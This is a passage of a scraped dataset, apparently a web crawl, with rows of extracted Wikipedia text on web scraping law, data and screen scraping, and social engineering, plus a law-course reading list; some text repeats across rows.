blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
258 | https://en.wikipedia.org/wiki/Web_scraping | http://www.tomwbell.com/NetLaw/Ch06.html | Thrifty-Tel, Inc. v. Bezenek, 54 Cal. Rptr. 2d 468 (Cal. Ct. App. 1996) (affirming judgment that unauthorized access to telephone system constituted trespass to chattels) an alternate source CompuServe, Inc. v. Cyber Promotions, Inc., 962 F. Supp. 1015 (S.D. Oh. 1997) (granting preliminary injuction on grounds that unsolicited email constituted a trespass to chattels) an alternate source eBay, Inc. v. Bidder's Edge, Inc., 100 F. Supp. 2d 1058 (N.D. Cal. 2000) (granting preliminary injunction on defendant's use of automated querying programs to obtain information off of plaintiff's website and over plaintiff's objections) an alternate source . Intel Corp. v. Hamidi, 30 Cal.4th 1342, 71 P.3d 296, 1 Cal.Rptr.3d 32 (Cal. 2003) (limiting trespass to chattels under California law to acts physically damaging or functionally interfering with property) an alternate source (PDF format) Bell's Classes 12 and 13: Please read the materials in Ch.06. Dan L. Burk, The Trouble With Trespass, 3 J. SMALL EMERGING BUS. L. 1 (1998) (arguing that the Thrifty-Tel, CompuServe, and Intel courts misapplied the law of trespass to chattels and advocating that courts instead analyze such cases under the law of nuisance) an alternate source (PDF format) |
259 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-5 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
260 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Social_engineering_(security) | In the context of information security, social engineering is the psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in the sense that it is often one of the many steps in a more complex fraud scheme. 1 It has also been defined as "any act that influences a person to take an action that may or may not be in their best interests. 2 Research done in 2020 has indicated that social engineering will be one of the most prominent challenges of the upcoming decade. Having proficiency in social engineering will be increasingly important for organizations and countries, due to the impact on geopolitics as well. Social engineering raises the question of whether our decisions will be accurately informed if our primary information is engineered and biased. 3 Social engineering attacks have been increasing in intensity and number, cementing the need for novel detection techniques and cyber security educational programs. 4 All social engineering techniques are based on attributes of human decision-making known as cognitive biases. 5 6 One example of social engineering is an individual who walks into a building and posts an official-looking announcement to the company bulletin that says the number for the help desk has changed. So, when employees call for help the individual asks them for their passwords and IDs thereby gaining the ability to access the company's private information. Another example of social engineering would be that the hacker contacts the target on a social networking site and starts a conversation with the target. Gradually the hacker gains the trust of the target and then uses that trust to get access to sensitive information like password or bank account details. 7 Pretexting (adj. pretextual), also known in the UK as blagging, 8 is the act of creating and using an invented scenario (the pretext) to engage a targeted victim in a manner that increases the chance the victim will divulge information or perform actions that would be unlikely in ordinary circumstances. 9 An elaborate lie, it most often involves some prior research or setup and the use of this information for impersonation (e.g., date of birth, Social Security number, last bill amount) to establish legitimacy in the mind of the target. 10 Water holing is a targeted social engineering strategy that capitalizes on the trust users have in websites they regularly visit. The victim feels safe to do things they would not do in a different situation. A wary person might, for example, purposefully avoid clicking a link in an unsolicited email, but the same person would not hesitate to follow a link on a website they often visit. So, the attacker prepares a trap for the unwary prey at a favored watering hole. This strategy has been successfully used to gain access to some (supposedly) very secure systems. 11 Baiting is like the real-world Trojan horse that uses physical media and relies on the curiosity or greed of the victim. 12 In this attack, attackers leave malware-infected floppy disks, CD-ROMs, or USB flash drives in locations people will find them (bathrooms, elevators, sidewalks, parking lots, etc.), give them legitimate and curiosity-piquing labels, and wait for victims. Unless computer controls block infections, insertion compromises PCs "auto-running" media. Hostile devices can also be used. 13 For instance, a "lucky winner" is sent a free digital audio player compromising any computer it is plugged to. A "road apple" (the colloquial term for horse manure, suggesting the device's undesirable nature) is any removable media with malicious software left in opportunistic or conspicuous places. It may be a CD, DVD, or USB flash drive, among other media. Curious people take it and plug it into a computer, infecting the host and any attached networks. Again, hackers may give them enticing labels, such as "Employee Salaries" or "Confidential". 14 One study published in 2016 had researchers drop 297 USB drives around the campus of the University of Illinois. The drives contained files on them that linked to webpages owned by the researchers. The researchers were able to see how many of the drives had files on them opened, but not how many were inserted into a computer without having a file opened. Of the 297 drives that were dropped, 290 (98%) of them were picked up and 135 (45%) of them "called home". 15 In common law, pretexting is an invasion of privacy tort of appropriation. 16 In December 2006, United States Congress approved a Senate sponsored bill making the pretexting of telephone records a federal felony with fines of up to $250,000 and ten years in prison for individuals (or fines of up to $500,000 for companies). It was signed by President George W. Bush on 12 January 2007. 17 The 1999 Gramm-Leach-Bliley Act (GLBA) is a U.S. Federal law that specifically addresses pretexting of banking records as an illegal act punishable under federal statutes. When a business entity such as a private investigator, SIU insurance investigator, or an adjuster conducts any type of deception, it falls under the authority of the Federal Trade Commission (FTC). This federal agency has the obligation and authority to ensure that consumers are not subjected to any unfair or deceptive business practices. US Federal Trade Commission Act, Section 5 of the FTCA states, in part: "Whenever the Commission shall have reason to believe that any such person, partnership, or corporation has been or is using any unfair method of competition or unfair or deceptive act or practice in or affecting commerce, and if it shall appear to the Commission that a proceeding by it in respect thereof would be to the interest of the public, it shall issue and serve upon such person, partnership, or corporation a complaint stating its charges in that respect. The statute states that when someone obtains any personal, non-public information from a financial institution or the consumer, their action is subject to the statute. It relates to the consumer's relationship with the financial institution. For example, a pretexter using false pretenses either to get a consumer's address from the consumer's bank, or to get a consumer to disclose the name of their bank, would be covered. The determining principle is that pretexting only occurs when information is obtained through false pretenses. While the sale of cell telephone records has gained significant media attention, and telecommunications records are the focus of the two bills currently before the United States Senate, many other types of private records are being bought and sold in the public market. Alongside many advertisements for cell phone records, wireline records and the records associated with calling cards are advertised. As individuals shift to VoIP telephones, it is safe to assume that those records will be offered for sale as well. Currently, it is legal to sell telephone records, but illegal to obtain them. 18 U.S. Rep. Fred Upton (R-Kalamazoo, Michigan), chairman of the Energy and Commerce Subcommittee on Telecommunications and the Internet, expressed concern over the easy access to personal mobile phone records on the Internet during a House Energy Commerce Committee hearing on "Phone Records For Sale: Why Aren't Phone Records Safe From Pretexting? Illinois became the first state to sue an online records broker when Attorney General Lisa Madigan sued 1st Source Information Specialists, Inc. A spokeswoman for Madigan's office said. The Florida-based company operates several Web sites that sell mobile telephone records, according to a copy of the suit. The attorneys general of Florida and Missouri quickly followed Madigan's lead, filing suits respectively, against 1st Source Information Specialists and, in Missouri's case, one other records broker First Data Solutions, Inc. Several wireless providers, including T-Mobile, Verizon, and Cingular filed earlier lawsuits against records brokers, with Cingular winning an injunction against First Data Solutions and 1st Source Information Specialists. U.S. Senator Charles Schumer (D-New York) introduced legislation in February 2006 aimed at curbing the practice. The Consumer Telephone Records Protection Act of 2006 would create felony criminal penalties for stealing and selling the records of mobile phone, landline, and Voice over Internet Protocol (VoIP) subscribers. Patricia Dunn, former chairwoman of Hewlett Packard, reported that the HP board hired a private investigation company to delve into who was responsible for leaks within the board. Dunn acknowledged that the company used the practice of pretexting to solicit the telephone records of board members and journalists. Chairman Dunn later apologized for this act and offered to step down from the board if it was desired by board members. 19 Unlike Federal law, California law specifically forbids such pretexting. The four felony charges brought on Dunn were dismissed. 20 Following the 2017 Equifax data breach in which over 150 million private records were leaked (including Social Security numbers, and drivers license numbers, birthdates, etc.), warnings were sent out regarding the dangers of impending security risks. 21 In the day after the establishment of a legitimate help website (equifaxsecurity2017.com) dedicated to people potentially victimized by the breach, 194 malicious domains were reserved from small variations on the URL, capitalizing on the likelihood of people mistyping. 22 23 During the 2016 United States Elections, hackers associated with Russian Military Intelligence (GRU) sent phishing emails directed to members of Hillary Clinton's campaign, disguised as a Google alert. 24 Many members, including the chairman of the campaign, John Podesta, had entered their passwords thinking it would be reset, causing their personal information, and thousands of private emails and documents to be leaked. 25 With this information, they hacked into other computers in the Democratic Congressional Campaign Committee, implanting malware in them, which caused their computer activities to be monitored and leaked. 25 Susan Headley became involved in phreaking with Kevin Mitnick and Lewis de Payne in Los Angeles, but later framed them for erasing the system files at US Leasing after a falling out, leading to Mitnick's first conviction. She retired to professional poker. 26 Mike Ridpath is a security consultant, published author, speaker and previous member of w00w00. He is well known for developing techniques and tactics for social engineering through cold calling. He became well known for live demonstrations as well as playing recorded calls after talks where he explained his thought process on what he was doing to get passwords through the phone. 27 28 29 30 31 As a child, Ridpath was connected with Badir Brothers and was widely known within the phreaking and hacking community for his articles with popular underground ezines, such as, Phrack, B4B0 and 9x on modifying Oki 900s, blueboxing, satellite hacking and RCMAC. 32 33 Brothers Ramy, Muzher, and Shadde Badir—all of whom were blind from birth—managed to set up an extensive phone and computer fraud scheme in Israel in the 1990s using social engineering, voice impersonation, and Braille-display computers. 34 35 Christopher J. Hadnagy is an American social engineer and information technology security consultant. He is best known as an author of 4 books on social engineering and cyber security 36 37 38 39 and founder of Innocent Lives Foundation, an organization that helps tracking and identifying child trafficking by seeking the assistance of information security specialists, using data from open-source intelligence (OSINT) and collaborating with law enforcement. 40 41 |
261 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-31 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
262 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:Short_description_matches_Wikidata | This category contains articles whose short description matches the description field of the corresponding Wikidata item. No action is needed. This is a tracking category only. The following 200 pages are in this category, out of approximately 2,038,644 total. This list may not reflect recent changes. |
